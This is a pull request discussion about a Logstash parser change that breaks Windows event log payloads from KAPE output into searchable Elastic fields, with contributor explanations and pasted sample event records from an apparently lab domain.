Update 6504-kape_evtxfiles.conf

[bedangSen]

Changes to the configuration file to add the individual fields in the Event log payload as searchable fields in Elastic.

[philhagen]

Thanks, @bedangSen - this is an interesting approach that could benefit some other data files as well! do you have a few log entries that the PR'ed config file breaks out as intended? (redacted is fine, of course!). thanks!

[bedangSen]

Hey @philhagen would a screenshot work? Or are you looking for the raw Evtxfile that was parsed?

Attaching a screenshot for reference if that helps.

[philhagen]

if you could copy-paste the original line(s) from the source file, that would be best. I run a bunch of tests and debugging traces before promoting parsers to production to be sure there are no regression errors.

[bedangSen]

Update: Adding gsub filter to convert fields which have a field name but no field value to key:value pair. For example {"name","field_key"} to {"field_key":"-"}. This prevents the json filter from breaking.

For Example:

{"EventData":{"Data":[{"name":"VolumeGuid","text":"00000000-0000-0000-0000-000000000000"},{"name":"VolumeNameLength","text":"0"},{"name":"VolumeName"}]}}

Initially became:

{"EventData":{"Data":[{"VolumeGuid":"00000000-0000-0000-0000-000000000000"},{"VolumeNameLength":"0"},{"VolumeName"}]}}

This would break the json filter since there is no value pair for "VolumeName".

The new update appends an empty value pair for such fields. For example:

{"EventData":{"Data":[{"VolumeGuid":"00000000-0000-0000-0000-000000000000"},{"VolumeNameLength":"0"},{"VolumeName":"-"}]}}

Note: You may have to increase index.mapping.total_fields.limit to a higher value.

[bedangSen]

Update: Adding gsub filter to break parent level of the json properly.

The following entries were still breaking

{"EventData":{"name":"TaskTerminationEvent","Data":[{"name":"TaskName","text":"\\{2c357fd5-8a7e-4058-a5fb-915cb023e920}"},{"name":"InstanceId","text":"ce175574-18b2-4086-ab3e-f99e98b6ba90"}]}}

{"EventData":{"name":"TMP_EVENT_TIME_SOURCE_REACHABLE","Data":{"name":"TimeSource","text":"base-dc.shieldbase.lan (ntp.d|0.0.0.0:123->172.16.4.4:123)"}}}

This would end up getting pushed as the below in the previous commit:

{
    "EventData": {
        "TaskTerminationEvent",
        "Data": [
            {
                "name": "TaskName": "\\{2c357fd5-8a7e-4058-a5fb-915cb023e920}"
            },
            {
                "InstanceId": "ce175574-18b2-4086-ab3e-f99e98b6ba90"
            }
        ]
    }
}

New commit resolves this issue.

Note: I used the _jsonparsefailure tag to debug what was breaking the json filter.

[bedangSen]

if you could copy-paste the original line(s) from the source file, that would be best. I run a bunch of tests and debugging traces before promoting parsers to production to be sure there are no regression errors.

I hope the below helps:

{"ChunkNumber":160,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"    if (Test-Path $obj.ProfilePath) {\\n, \\tDetailSequence=1\\n\\tDetailTotal=1\\n\\n\\tSequenceNumber=19\\n\\n\\tUserId=shieldbase\\\\cbarton-a\\n\\tHostName=ServerRemoteHost\\n\\tHostVersion=1.0.0.0\\n\\tHostId=ee627473-0999-4c35-8c0b-facea2a123c0\\n\\tHostApplication=C:\\\\WINDOWS\\\\system32\\\\wsmprovhost.exe -Embedding\\n\\tEngineVersion=5.1.16299.547\\n\\tRunspaceId=b7f1bba6-4c21-44c1-99ba-f58aa81d59f3\\n\\tPipelineId=1\\n\\tScriptName=\\n\\tCommandLine=    if (Test-Path $obj.ProfilePath) {\\n, CommandInvocation(Test-Path): \\\"Test-Path\\\"\\nParameterBinding(Test-Path): name=\\\"Path\\\"; value=\\\"C:\\\\Users\\\\cbarton-a\\\\Documents\\\\WindowsPowershell\\\\Microsoft.Powershell_profile.ps1\\\"\\n\",\"Binary\":\"\"}}","Channel":"Windows PowerShell","Provider":"PowerShell","EventId":800,"EventRecordId":"4417","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Windows PowerShell.evtx","TimeCreated":"2018-08-15T16:24:45.8372911+00:00","RecordNumber":4417}
{"ChunkNumber":241,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"0, WindowsUpdateFailure3, Not available, 0, 10.0.16299.98, 80240437, 00000000-0000-0000-0000-000000000000, Scan, 0, 0, 0, Update;taskhostw, {855E8A7C-ECB4-4CA3-B045-1DFA50104289}, 0, \\n\\\\\\\\?\\\\C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\Temp\\\\WER73E7.tmp.WERInternalMetadata.xml, C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\NonCritical_10.0.16299.98_d127d0c9d9253bdcb4e9f182ac69fab59f08c0_00000000_09341a0e, 0, 218eba04-444b-4af0-b56a-2830deef1890, 524388\",\"Binary\":\"\"}}","Channel":"Application","Provider":"Windows Error Reporting","EventId":1001,"EventRecordId":"263016","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Application.evtx","TimeCreated":"2018-09-04T20:52:22.3519990+00:00","RecordNumber":263016}
{"PayloadData1":"Target: NT AUTHORITY\\SYSTEM","PayloadData2":"LogonType 5","UserName":"shieldbase\\BASE-RD-01$","RemoteHost":"- (-)","ExecutableInfo":"C:\\Windows\\System32\\services.exe","MapDescription":"Successful logon","ChunkNumber":412,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"TargetUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"TargetUserName\",\"#text\":\"SYSTEM\"},{\"@Name\":\"TargetDomainName\",\"#text\":\"NT AUTHORITY\"},{\"@Name\":\"TargetLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"LogonType\",\"#text\":\"5\"},{\"@Name\":\"LogonProcessName\",\"#text\":\"Advapi  \"},{\"@Name\":\"AuthenticationPackageName\",\"#text\":\"Negotiate\"},{\"@Name\":\"WorkstationName\",\"#text\":\"-\"},{\"@Name\":\"LogonGuid\",\"#text\":\"00000000-0000-0000-0000-000000000000\"},{\"@Name\":\"TransmittedServices\",\"#text\":\"-\"},{\"@Name\":\"LmPackageName\",\"#text\":\"-\"},{\"@Name\":\"KeyLength\",\"#text\":\"0\"},{\"@Name\":\"ProcessId\",\"#text\":\"0x2E4\"},{\"@Name\":\"ProcessName\",\"#text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"@Name\":\"IpAddress\",\"#text\":\"-\"},{\"@Name\":\"IpPort\",\"#text\":\"-\"},{\"@Name\":\"ImpersonationLevel\",\"#text\":\"%%1833\"},{\"@Name\":\"RestrictedAdminMode\",\"#text\":\"-\"},{\"@Name\":\"TargetOutboundUserName\",\"#text\":\"-\"},{\"@Name\":\"TargetOutboundDomainName\",\"#text\":\"-\"},{\"@Name\":\"VirtualAccount\",\"#text\":\"%%1843\"},{\"@Name\":\"TargetLinkedLogonId\",\"#text\":\"0x0\"},{\"@Name\":\"ElevatedToken\",\"#text\":\"%%1842\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4624,"EventRecordId":"38158","ProcessId":776,"ThreadId":9308,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-08-18T12:21:50.3865023+00:00","RecordNumber":38158}
{"ChunkNumber":219,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-21-3445421715-2530590580-3149308974-1116\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"tdungan\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x2A8EACE\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"TB_0_microsoft.com\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"21311","ProcessId":744,"ThreadId":1328,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-06-22T06:55:45.3364468+00:00","RecordNumber":21311}
{"PayloadData1":"Task \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting","PayloadData3":"Instance Id f99a731e-9b33-4dde-9262-4d1b461808b4","ExecutableInfo":"%windir%\\system32\\wermgr.exe","MapDescription":"Scheduled task completed","ChunkNumber":151,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"@Name\":\"ActionSuccess\",\"Data\":[{\"@Name\":\"TaskName\",\"#text\":\"\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\QueueReporting\"},{\"@Name\":\"TaskInstanceId\",\"#text\":\"f99a731e-9b33-4dde-9262-4d1b461808b4\"},{\"@Name\":\"ActionName\",\"#text\":\"%windir%\\\\system32\\\\wermgr.exe\"},{\"@Name\":\"ResultCode\",\"#text\":\"0\"},{\"@Name\":\"EnginePID\",\"#text\":\"18192\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-TaskScheduler/Operational","Provider":"Microsoft-Windows-TaskScheduler","EventId":201,"EventRecordId":"198614","ProcessId":1484,"ThreadId":15328,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx","TimeCreated":"2018-08-30T03:31:13.8276952+00:00","RecordNumber":198614}
{"ChunkNumber":216,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"000001FDF21247B0: Key Machine for content: 0116DC02-781B-D1D1-FC1C-C80195511E17\"},{\"@Name\":\"Function\",\"#text\":\"KeyMachine::KeyMachine\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\lib\\\\keymachine.cpp\"},{\"@Name\":\"Line Number\",\"#text\":\"90\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"272868","ProcessId":692,"ThreadId":8484,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-06T09:29:53.0850192+00:00","RecordNumber":272868}
{"PayloadData1":"Target: NT AUTHORITY\\SYSTEM","PayloadData2":"LogonType 5","UserName":"shieldbase\\BASE-RD-01$","RemoteHost":"- (-)","ExecutableInfo":"C:\\Windows\\System32\\services.exe","MapDescription":"Successful logon","ChunkNumber":602,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"TargetUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"TargetUserName\",\"#text\":\"SYSTEM\"},{\"@Name\":\"TargetDomainName\",\"#text\":\"NT AUTHORITY\"},{\"@Name\":\"TargetLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"LogonType\",\"#text\":\"5\"},{\"@Name\":\"LogonProcessName\",\"#text\":\"Advapi  \"},{\"@Name\":\"AuthenticationPackageName\",\"#text\":\"Negotiate\"},{\"@Name\":\"WorkstationName\",\"#text\":\"-\"},{\"@Name\":\"LogonGuid\",\"#text\":\"00000000-0000-0000-0000-000000000000\"},{\"@Name\":\"TransmittedServices\",\"#text\":\"-\"},{\"@Name\":\"LmPackageName\",\"#text\":\"-\"},{\"@Name\":\"KeyLength\",\"#text\":\"0\"},{\"@Name\":\"ProcessId\",\"#text\":\"0x2E4\"},{\"@Name\":\"ProcessName\",\"#text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"@Name\":\"IpAddress\",\"#text\":\"-\"},{\"@Name\":\"IpPort\",\"#text\":\"-\"},{\"@Name\":\"ImpersonationLevel\",\"#text\":\"%%1833\"},{\"@Name\":\"RestrictedAdminMode\",\"#text\":\"-\"},{\"@Name\":\"TargetOutboundUserName\",\"#text\":\"-\"},{\"@Name\":\"TargetOutboundDomainName\",\"#text\":\"-\"},{\"@Name\":\"VirtualAccount\",\"#text\":\"%%1843\"},{\"@Name\":\"TargetLinkedLogonId\",\"#text\":\"0x0\"},{\"@Name\":\"ElevatedToken\",\"#text\":\"%%1842\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4624,"EventRecordId":"53971","ProcessId":772,"ThreadId":4760,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-09-04T11:05:25.0032744+00:00","RecordNumber":53971}
{"ChunkNumber":207,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"Invoking license manager because license/lease polling time up: PFN Microsoft.WindowsFeedbackHub_1.1712.1141.0_x64__8wekyb3d8bbwe\"},{\"@Name\":\"Function\",\"#text\":\"InvokeLicenseManagerRequired\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\apisethost\\\\activationapis.cpp\"},{\"@Name\":\"Line Number\",\"#text\":\"331\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"272000","ProcessId":5544,"ThreadId":860,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-06T05:44:24.5553864+00:00","RecordNumber":272000}
{"ChunkNumber":102,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"10440","ProcessId":732,"ThreadId":4724,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-11T18:07:47.6528121+00:00","RecordNumber":10440}
{"PayloadData1":"SeSecurityPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeLoadDriverPrivilege, SeImpersonatePrivilege, SeDelegateSessionUserImpersonatePrivilege","UserName":"shieldbase\\BASE-RD-01$ (S-1-5-18)","MapDescription":"Administrative logon","ChunkNumber":376,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x968E862\"},{\"@Name\":\"PrivilegeList\",\"#text\":\"SeSecurityPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeLoadDriverPrivilege, SeImpersonatePrivilege, SeDelegateSessionUserImpersonatePrivilege\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4672,"EventRecordId":"35248","ProcessId":776,"ThreadId":576,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-08-11T22:33:53.0234829+00:00","RecordNumber":35248}
{"PayloadData1":"SeAssignPrimaryTokenPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeDelegateSessionUserImpersonatePrivilege","UserName":"NT AUTHORITY\\SYSTEM (S-1-5-18)","MapDescription":"Administrative logon","ChunkNumber":404,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"SYSTEM\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"NT AUTHORITY\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"PrivilegeList\",\"#text\":\"SeAssignPrimaryTokenPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeDelegateSessionUserImpersonatePrivilege\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4672,"EventRecordId":"37523","ProcessId":776,"ThreadId":576,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-08-17T01:29:34.8951972+00:00","RecordNumber":37523}
{"ChunkNumber":1,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"ProcessName\"},{\"@Name\":\"Type\",\"#text\":\"1\"},{\"@Name\":\"ErrorCode\",\"#text\":\"2147942403\"},{\"@Name\":\"File\",\"#text\":\"onecoreuap\\\\shell\\\\cloudstore\\\\store\\\\cache\\\\src\\\\cloudcacheinitializer.cpp\"},{\"@Name\":\"LineNumber\",\"#text\":\"178\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-CloudStore/Operational","Provider":"Microsoft-Windows-CloudStore","EventId":1,"EventRecordId":"2302","ProcessId":8,"ThreadId":14116,"Level":2,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-CloudStore%4Operational.evtx","TimeCreated":"2018-08-06T17:55:18.6402904+00:00","RecordNumber":2302}
{"ChunkNumber":3,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Event\",\"#text\":\"4\"},{\"@Name\":\"SubscriberName\",\"#text\":\"TermSrv\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-Winlogon/Operational","Provider":"Microsoft-Windows-Winlogon","EventId":812,"EventRecordId":"564","ProcessId":688,"ThreadId":6188,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Winlogon%4Operational.evtx","TimeCreated":"2018-05-25T17:29:26.7101098+00:00","RecordNumber":564}
{"ChunkNumber":102,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"10344","ProcessId":732,"ThreadId":3588,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-11T17:08:15.0409049+00:00","RecordNumber":10344}
{"ChunkNumber":64,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"        Get-Date([datetime]::FromFileTimeUtc($LastWriteTime)) -Format yyyyMMddThh:mm:ss\\n, \\tDetailSequence=1\\n\\tDetailTotal=1\\n\\n\\tSequenceNumber=91\\n\\n\\tUserId=shieldbase\\\\cbarton-a\\n\\tHostName=ServerRemoteHost\\n\\tHostVersion=1.0.0.0\\n\\tHostId=13f7ad71-b1ac-48a2-93d9-43430194a8db\\n\\tHostApplication=C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -Version 5.1 -s -NoLogo -NoProfile\\n\\tEngineVersion=5.1.16299.547\\n\\tRunspaceId=e279666b-f78f-445b-ae11-b22357f63042\\n\\tPipelineId=1\\n\\tScriptName=\\n\\tCommandLine=        Get-Date([datetime]::FromFileTimeUtc($LastWriteTime)) -Format yyyyMMddThh:mm:ss\\n, CommandInvocation(Get-Date): \\\"Get-Date\\\"\\nParameterBinding(Get-Date): name=\\\"Format\\\"; value=\\\"yyyyMMddThh:mm:ss\\\"\\nParameterBinding(Get-Date): name=\\\"Date\\\"; value=\\\"5/7/2018 9:53:23 PM\\\"\\n\",\"Binary\":\"\"}}","Channel":"Windows PowerShell","Provider":"PowerShell","EventId":800,"EventRecordId":"2405","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Windows PowerShell.evtx","TimeCreated":"2018-08-15T07:19:11.2802986+00:00","RecordNumber":2405}
{"ChunkNumber":36,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"UserSid\",\"#text\":\"S-1-5-21-3445421715-2530590580-3149308974-500\"},{\"@Name\":\"MainPackageFullName\",\"#text\":\"Microsoft.ZuneMusic_2019.18071.11711.0_neutral_~_8wekyb3d8bbwe\"},{\"@Name\":\"ErrorCode\",\"#text\":\"0x0\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-AppXDeploymentServer/Operational","Provider":"Microsoft-Windows-AppXDeployment-Server","EventId":821,"EventRecordId":"20634","ProcessId":15888,"ThreadId":11824,"Level":5,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx","TimeCreated":"2018-08-28T21:56:10.5588744+00:00","RecordNumber":20634}
{"PayloadData1":"Task \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting","PayloadData3":"Instance Id 417f1afd-fb23-41fe-b64e-aa40508b8238","ExecutableInfo":"%windir%\\system32\\wermgr.exe","MapDescription":"Scheduled task executed","ChunkNumber":178,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"@Name\":\"ActionStart\",\"Data\":[{\"@Name\":\"TaskName\",\"#text\":\"\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\QueueReporting\"},{\"@Name\":\"ActionName\",\"#text\":\"%windir%\\\\system32\\\\wermgr.exe\"},{\"@Name\":\"TaskInstanceId\",\"#text\":\"417f1afd-fb23-41fe-b64e-aa40508b8238\"},{\"@Name\":\"EnginePID\",\"#text\":\"296\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-TaskScheduler/Operational","Provider":"Microsoft-Windows-TaskScheduler","EventId":200,"EventRecordId":"201480","ProcessId":556,"ThreadId":4260,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx","TimeCreated":"2018-08-31T14:23:49.0829094+00:00","RecordNumber":201480}
{"ChunkNumber":31,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"operationName\",\"#text\":\"Enumeration\"}}}","UserId":"S-1-5-20","Channel":"Microsoft-Windows-WinRM/Operational","Provider":"Microsoft-Windows-WinRM","EventId":132,"EventRecordId":"270115","ProcessId":1100,"ThreadId":3476,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WinRM%4Operational.evtx","TimeCreated":"2018-08-31T11:31:10.2949536+00:00","RecordNumber":270115}
{"ChunkNumber":250,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"\\t$item | Add-Member -Type NoteProperty -Name \\\"SID\\\" -Value  $SId\\n, \\tDetailSequence=1\\n\\tDetailTotal=1\\n\\n\\tSequenceNumber=721\\n\\n\\tUserId=shieldbase\\\\cbarton-a\\n\\tHostName=ServerRemoteHost\\n\\tHostVersion=1.0.0.0\\n\\tHostId=adc556b8-0a10-4bc8-abac-9fac0e1de9f6\\n\\tHostApplication=C:\\\\WINDOWS\\\\system32\\\\wsmprovhost.exe -Embedding\\n\\tEngineVersion=5.1.16299.547\\n\\tRunspaceId=12462643-785f-4c49-b568-77280bb2c2e2\\n\\tPipelineId=3\\n\\tScriptName=\\n\\tCommandLine=\\t$item | Add-Member -Type NoteProperty -Name \\\"SID\\\" -Value  $SId\\n, CommandInvocation(Add-Member): \\\"Add-Member\\\"\\nParameterBinding(Add-Member): name=\\\"MemberType\\\"; value=\\\"NoteProperty\\\"\\nParameterBinding(Add-Member): name=\\\"Name\\\"; value=\\\"SID\\\"\\nParameterBinding(Add-Member): name=\\\"InputObject\\\"; value=\\\"\\\\\\\\BASE-RD-01\\\\root\\\\cimv2:Win32_Process.Handle=\\\"3700\\\"\\\"\\n\",\"Binary\":\"\"}}","Channel":"Windows PowerShell","Provider":"PowerShell","EventId":800,"EventRecordId":"6277","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Windows PowerShell.evtx","TimeCreated":"2018-08-15T16:36:40.2026621+00:00","RecordNumber":6277}
{"PayloadData1":"PID: 8376","PayloadData2":"Path: C:\\Windows\\System32\\wbem\\WmiPerfInst.dll","MapDescription":"WMI wmiprvse execution","ChunkNumber":85,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"UserData\":{\"Operation_StartedOperational\":{\"ProviderName\":\"WmiPerfInst\",\"Code\":\"0x0\",\"HostProcess\":\"wmiprvse.exe\",\"ProcessID\":\"8376\",\"ProviderPath\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPerfInst.dll\"}}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-WMI-Activity/Operational","Provider":"Microsoft-Windows-WMI-Activity","EventId":5857,"EventRecordId":"14344","ProcessId":8376,"ThreadId":360,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx","TimeCreated":"2018-09-04T17:48:10.2566492+00:00","RecordNumber":14344}
{"ChunkNumber":119,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"Returning 1 lease documents for contentid 0116DC02-781B-D1D1-FC1C-C80195511E17\"},{\"@Name\":\"Function\",\"#text\":\"ClipStorage::GetLeaseDocumentsForKeyDocument\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\lib\\\\clipstorage.cpp\"},{\"@Name\":\"Line Number\",\"#text\":\"495\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"263702","ProcessId":692,"ThreadId":10200,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-05T01:08:01.1305297+00:00","RecordNumber":263702}
{"PayloadData1":"PID: 5052","PayloadData2":"Path: C:\\Windows\\System32\\wbem\\WmiPerfInst.dll","MapDescription":"WMI wmiprvse execution","ChunkNumber":116,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"UserData\":{\"Operation_StartedOperational\":{\"ProviderName\":\"WmiPerfInst\",\"Code\":\"0x0\",\"HostProcess\":\"wmiprvse.exe\",\"ProcessID\":\"5052\",\"ProviderPath\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPerfInst.dll\"}}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-WMI-Activity/Operational","Provider":"Microsoft-Windows-WMI-Activity","EventId":5857,"EventRecordId":"17846","ProcessId":5052,"ThreadId":5888,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx","TimeCreated":"2018-09-06T21:17:03.0175943+00:00","RecordNumber":17846}
